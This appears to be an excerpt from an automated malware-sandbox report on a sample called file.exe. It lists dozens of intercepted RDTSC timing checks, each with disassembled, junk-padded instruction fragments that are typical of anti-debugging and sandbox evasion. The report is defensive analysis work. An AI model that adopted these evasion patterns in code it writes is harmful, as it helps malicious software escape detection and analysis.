              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1260A74 second address: 1260A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1261B18 second address: 1261B4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F6778CEBE52h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F6778CEBE54h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EFF4 second address: 127EFFE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EFFE second address: 127F008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F6778CEBE46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F008 second address: 127F025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F67787C0192h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F30D second address: 127F313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F313 second address: 127F318 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F48A second address: 127F48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F48F second address: 127F49A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F67787C0186h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EA76 second address: 127EA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6778CEBE46h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EA83 second address: 127EA89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127F906 second address: 127F916 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6778CEBE48h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127FD51 second address: 127FD57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127FD57 second address: 127FD5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127FD5B second address: 127FD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1282C0C second address: 1282C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128A1A1 second address: 128A1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128A1A5 second address: 128A1D8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6778CEBE46h 0x00000008 jmp 00007F6778CEBE4Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jc 00007F6778CEBE46h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6778CEBE4Eh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128A1D8 second address: 128A1DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128A32E second address: 128A333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128A333 second address: 128A351 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0192h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jbe 00007F67787C0186h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128A351 second address: 128A355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128A4C8 second address: 128A4D6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128AA66 second address: 128AA86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6778CEBE50h 0x00000009 jmp 00007F6778CEBE4Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128AD93 second address: 128ADB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F67787C0199h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128ADB0 second address: 128ADD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6778CEBE50h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128B2BC second address: 128B2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124EC00 second address: 124EC05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124EC05 second address: 124EC0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124ED4F second address: 124EDF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 xchg eax, ebx 0x00000006 mov ecx, dword ptr [ebp+122D368Fh] 0x0000000c push dword ptr fs:[00000000h] 0x00000013 add dword ptr [ebp+122D19EBh], esi 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 jmp 00007F6778CEBE4Bh 0x00000025 mov dword ptr [ebp+124929A0h], esp 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F6778CEBE48h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000015h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 cmp dword ptr [ebp+122D2BC5h], 00000000h 0x0000004c jne 00007F6778CEBF22h 0x00000052 and cx, A677h 0x00000057 mov byte ptr [ebp+122D3673h], 00000047h 0x0000005e push 00000000h 0x00000060 push edx 0x00000061 call 00007F6778CEBE48h 0x00000066 pop edx 0x00000067 mov dword ptr [esp+04h], edx 0x0000006b add dword ptr [esp+04h], 00000017h 0x00000073 inc edx 0x00000074 push edx 0x00000075 ret 0x00000076 pop edx 0x00000077 ret 0x00000078 mov edx, 5BAD99B3h 0x0000007d mov eax, D49AA7D2h 0x00000082 push eax 0x00000083 push eax 0x00000084 push edx 0x00000085 push eax 0x00000086 push edx 0x00000087 jmp 00007F6778CEBE4Dh 0x0000008c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124EDF1 second address: 124EE06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0191h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124EE06 second address: 124EE10 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6778CEBE4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124F2A0 second address: 124F2CC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 09893DA6h 0x00000011 mov dx, 86EAh 0x00000015 push F55E9819h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F67787C018Eh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124F2CC second address: 124F2E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124F2E4 second address: 124F2EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124F448 second address: 124F4AE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xchg eax, esi 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F6778CEBE48h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D327Bh], edx 0x00000028 nop 0x00000029 pushad 0x0000002a jmp 00007F6778CEBE50h 0x0000002f jmp 00007F6778CEBE4Bh 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 jmp 00007F6778CEBE57h 0x0000003e push ecx 0x0000003f pop ecx 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124F5A8 second address: 124F5B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F67787C0186h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124F5B2 second address: 124F5C4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124F5C4 second address: 124F5CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124F5CA second address: 124F5E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F6778CEBE46h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124F5E5 second address: 124F618 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F67787C0196h 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007F67787C0186h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124FD4E second address: 124FD52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124FD52 second address: 124FD56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124FEFE second address: 124FF04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124FFD9 second address: 1250043 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push ecx 0x0000000b push esi 0x0000000c or dh, FFFFFF91h 0x0000000f pop ecx 0x00000010 pop ecx 0x00000011 lea eax, dword ptr [ebp+1249298Ch] 0x00000017 jmp 00007F67787C018Ch 0x0000001c mov edx, 1FE92BF9h 0x00000021 push eax 0x00000022 jmp 00007F67787C0199h 0x00000027 mov dword ptr [esp], eax 0x0000002a mov ecx, dword ptr [ebp+122D3679h] 0x00000030 lea eax, dword ptr [ebp+12492948h] 0x00000036 mov edx, 6C6BC291h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jng 00007F67787C0188h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1250043 second address: 125004D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6778CEBE4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125004D second address: 123230D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F67787C0197h 0x0000000e call dword ptr [ebp+122D17E5h] 0x00000014 push ecx 0x00000015 jmp 00007F67787C0192h 0x0000001a pop ecx 0x0000001b push eax 0x0000001c jp 00007F67787C018Eh 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129076C second address: 1290790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F6778CEBE4Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6778CEBE4Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1290912 second address: 1290918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1290918 second address: 129091E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1290EBD second address: 1290ECE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F67787C0186h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1290ECE second address: 1290EF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F6778CEBE48h 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f jmp 00007F6778CEBE52h 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007F6778CEBE46h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1290EF8 second address: 1290EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1293765 second address: 129376A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129376A second address: 1293782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F67787C018Eh 0x00000009 jnl 00007F67787C0186h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1293485 second address: 129348B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129348B second address: 129348F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129348F second address: 129349B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129349B second address: 129349F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12960A2 second address: 12960A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12961CC second address: 12961D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12961D0 second address: 12961E4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F6778CEBE4Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12961E4 second address: 12961EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129636F second address: 1296373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1296373 second address: 12963AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F67787C0192h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F67787C0198h 0x00000011 jnl 00007F67787C0186h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1296562 second address: 1296570 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F6778CEBE46h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1296570 second address: 1296574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129C0F8 second address: 129C0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129C0FC second address: 129C129 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0196h 0x00000007 jmp 00007F67787C018Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F67787C0186h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129C129 second address: 129C140 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edx 0x0000000c pop edx 0x0000000d js 00007F6778CEBE46h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129C140 second address: 129C146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129C146 second address: 129C155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F6778CEBE46h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129C155 second address: 129C159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129C159 second address: 129C15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129B563 second address: 129B567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129B567 second address: 129B571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129B571 second address: 129B57B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F67787C018Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129B849 second address: 129B84D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129B84D second address: 129B878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F67787C0186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F67787C0195h 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129B878 second address: 129B88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6778CEBE51h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129B88D second address: 129B893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129E868 second address: 129E86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129E86C second address: 129E87B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F67787C0186h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129E87B second address: 129E882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129E882 second address: 129E887 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129E9B4 second address: 129E9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129ED52 second address: 129ED56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A3035 second address: 12A303A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A303A second address: 12A303F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A303F second address: 12A304D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6778CEBE46h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A304D second address: 12A3063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F67787C018Ah 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A3063 second address: 12A3088 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6778CEBE46h 0x00000008 jnc 00007F6778CEBE46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F6778CEBE51h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A31D9 second address: 12A31F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Dh 0x00000007 jmp 00007F67787C018Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A3356 second address: 12A335A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A335A second address: 12A335E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A335E second address: 12A3364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
